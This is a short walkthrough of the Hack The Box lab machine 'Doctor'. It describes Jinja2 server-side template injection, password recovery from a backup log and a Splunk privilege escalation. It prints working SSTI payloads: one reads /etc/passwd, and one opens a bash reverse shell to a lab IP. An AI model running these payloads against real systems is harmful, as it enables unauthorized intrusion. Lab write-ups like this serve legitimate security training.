Doctor-HTB-Walkthrough

1. Portscan

2. User flag

Found a login page after adding doctors.htb to /etc/hosts. Initially, I played around with SQLI but did not gain anything. With the help of gobuster we found some pages.

Then I registered myself and logged in. There is a new message page.  Remember the archive page we found using gobuster, anything we post here gets displayed in the source code of the archive page. I successfully executed XSS but XSS has no role. So I followed payloadallthethings and found Server-Side Template Injection. Posting the simple payload confirms its jinja2 web template engine running in the backend.

Following the same, I tried executing commands.

Using the highlighted payload. I successfully executed command as

{{config._class.init.globals_['os'].popen('cat /etc/passwd').read()}}

Alright, Now it's time to take a shell.

{{config._class.init.globals_['os'].popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.138/5555 0>&1"').read()}}

After posting the payload just refresh the archive page and we got our first shell as web.

Not over yet, there is another user named Shaun that has a user flag.  Using linpeas I found a backup file in /var/log/apache2/backup where I found the password of Shaun.

2. Root

Taking root is simple, Remember in the port scan we found splunkd running on 8809 port. That’s the way. With simple googling, I found an exploit in git.